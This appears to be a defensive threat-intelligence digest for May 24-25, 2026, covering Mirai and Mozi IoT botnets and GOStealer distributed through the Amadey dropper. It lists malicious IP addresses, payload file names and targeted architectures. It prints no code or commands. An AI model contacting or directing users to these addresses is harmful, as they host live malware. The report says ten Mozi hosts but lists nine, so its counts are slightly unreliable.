During the 24-hour period from May 24-25, 2026, threat intelligence monitoring identified 49 malicious infrastructure indicators, representing a focused IoT botnet and information stealer campaign. The threat landscape was dominated by Mirai and Mozi botnet variants targeting Linux-based IoT devices across multiple architectures, alongside Amadey dropper activity deploying GOStealer information stealing malware on Windows systems.
The most significant threat activity involved widespread Mirai botnet infrastructure at IP 85.239.151.41, hosting 34 distinct malware payloads targeting ARM, MIPS, x86, PowerPC, SPARC, and other architectures. Mozi botnet activity remained persistent with 10 compromised hosts actively distributing malware. GOStealer campaigns leveraged Amadey as a dropper mechanism, indicating organized credential harvesting operations. All observed activity aligns with commodity malware distribution patterns typical of automated botnet operations.
No critical vulnerabilities, KEV additions, or RSS-sourced threat intelligence were reported during this period. The threat environment reflects ongoing IoT exploitation and credential theft campaigns rather than emerging zero-day or sophisticated APT activity. Organizations should prioritize IoT device hardening, network segmentation, and endpoint detection capabilities to mitigate these persistent commodity threats.
Extensive Mirai botnet infrastructure identified hosting multi-architecture payloads for IoT device compromise
Active Mirai botnet command infrastructure hosting 34 distinct ELF payloads targeting ARM, MIPS, x86, PowerPC, SPARC, SuperH, ARC, and m68k architectures. Uses wget-based download scripts (opendir variant) for automated propagation across vulnerable IoT devices.
IP 45.198.224.38 distributing Mirai MIPS payload, likely part of coordinated botnet expansion campaign.
Persistent Mozi P2P botnet infrastructure targeting ARM and MIPS IoT devices
Ten compromised hosts (117.26.208.187, 27.206.90.87, 182.113.38.82, 116.139.99.165, 42.237.50.191, 182.119.231.15, 125.40.121.239, 222.127.226.53, 110.39.247.200) actively distributing Mozi botnet payloads via bin.sh scripts. Targets 32-bit ARM and MIPS architectures commonly found in routers and IoT devices.
GOStealer malware distribution via Amadey dropper framework
Windows-based information stealer campaign using Amadey as initial dropper from IP 91.92.242.236. Multiple file variants (ace28c8550a31cc6.exe, 7d8f95cb60bbcf0f.exe) identified. GOStealer targets credentials, browser data, and system information for exfiltration.
Secondary Amadey dropper activity at 62.60.226.140 with automated C2 monitoring capabilities, indicating active command and control infrastructure for payload distribution.
Observed attacker techniques and tooling across botnet and stealer campaigns
Threat actors compiled Mirai variants for 11+ processor architectures (ARM5/6/7, MIPS, x86, PowerPC, SPARC, SuperH, ARC, m68k) to maximize IoT device compromise reach. Demonstrates sophisticated build pipeline and broad targeting strategy.